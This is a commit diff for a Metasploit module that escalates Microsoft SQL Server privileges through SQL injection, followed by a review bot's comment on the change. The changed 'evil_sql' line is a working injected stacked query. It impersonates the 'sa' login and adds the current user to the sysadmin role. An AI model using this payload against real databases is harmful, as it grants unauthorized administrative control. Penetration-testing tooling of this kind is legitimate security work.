Commit ac0e23d

Land rapid7#4932, hardcoded username fix
For mssql_escalate_execute_as_sqli.
2 parents b0a8fd8 + 00dbcc1 commit ac0e23d

1 file changed

+2
-2
lines changed

modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb

Lines changed: 2 additions & 2 deletions
@@ -190,10 +190,10 @@ def check_imp_sysadmin(imp_user_list)
190190
end
191191

192192
# Attempt to escalate privileges
193-
def escalate_privs(imp_user,db_user)
193+
def escalate_privs(db_user)
194194

195195
# Setup Query - Impersonate the first sysadmin user on the list
196-
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
196+
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"
197197

198198
# Execute Query
199199
mssql_query(evil_sql)
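
Review bot: In the new `evil_sql` line, `#{db_user}` is interpolated straight into a single-quoted SQL literal with no escaping, so a username containing a single quote produces a malformed statement; double any embedded quotes (or validate the value) before building the string. Separately, the comment above it still reads "Impersonate the first sysadmin user on the list", while the statement keeps `'sa'` fixed and this change drops `imp_user` from the signature, so the comment no longer describes the code and should be updated to match. The signature now takes one argument instead of two; the call sites are not part of this hunk, so confirm they were changed to the new arity in the same commit.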
